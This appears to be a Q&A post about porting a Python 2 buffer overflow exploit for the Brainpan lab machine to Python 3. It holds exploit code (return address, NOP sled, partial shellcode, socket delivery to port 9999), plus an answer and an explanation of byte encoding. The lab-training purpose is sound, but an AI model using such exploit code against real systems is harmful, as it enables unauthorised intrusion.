
Using python 3 as a buffer overflow instead of Python 2


I am trying to use Python 3 instead of Python 2 to push a buffer overflow to Brainpan. Problem is Python 3 converts the bytes way differently. Does anyone know how to push the bytes in a simple way in Python 3 format?

Example code of the python2 code can be found at: http://blog.pentests.pl/2014/06/pentest-lab-brainpan-probably-the-fastest.html?m=1

Taken from page:

    import sys,socket

    eip = "\xf3\x12\x17\x31" #jmp esp address 0x311712f3
    buf = "\x90"*10 #nop sled
    buf += "\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
    buf... {Code snipped}

    payload = ("a"*524) + eip + buf

    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('192.168.0.xxx', 9999))  # connect() takes one (host, port) tuple

    print s.recv(1024)
    s.send(payload)
    print s.recv(1024)

I've tried s.send(payload.encode()) with various encodings. Nothing works as far as I can tell.


Solution

  • Try using bytes literals such as

    eip = b"\xf3\x12\x17\x31"
    buf = b"\x90"*10
    buf += b"\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
    

    and bypass the need for encoding altogether.
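Why `payload.encode()` changed the data in the question, shown as an added example that is not part of the original post or answer: in Python 3 a `str` holds Unicode code points, so the encoding chosen decides which bytes reach the socket. The helper names are hypothetical; the four address bytes are the ones quoted in the question.

```python
import struct

# Values quoted in the question; everything else here is constructed.
ADDR = 0x311712F3
AS_STR = "\xf3\x12\x17\x31"     # Python 3 str: four Unicode code points
AS_BYTES = b"\xf3\x12\x17\x31"  # bytes literal: four raw bytes


def wire_forms(text):
    """Return the bytes each encoding would put on the wire for a str."""
    forms = {
        "utf-8": text.encode("utf-8"),      # default for str.encode()
        "latin-1": text.encode("latin-1"),  # maps U+0000..U+00FF 1:1
    }
    try:
        forms["ascii"] = text.encode("ascii")
    except UnicodeEncodeError:
        forms["ascii"] = None  # code points >= 0x80 have no ASCII encoding
    return forms


def pack_le32(value):
    """Little-endian 32-bit packing; yields bytes with no encoding step."""
    return struct.pack("<I", value)


def mixing_raises():
    """Python 3 refuses to concatenate str and bytes instead of guessing."""
    try:
        "a" * 4 + AS_BYTES
    except TypeError:
        return True
    return False


if __name__ == "__main__":
    for name, data in wire_forms(AS_STR).items():
        print(f"{name:8}", data.hex() if data is not None else "UnicodeEncodeError")
    print("struct  ", pack_le32(ADDR).hex())
    print("str + bytes raises TypeError:", mixing_raises())
```

UTF-8 turns U+00F3 into the two bytes `c3 b3`, which lengthens the buffer and shifts every later offset; bytes literals or `struct.pack` avoid the encoding step entirely.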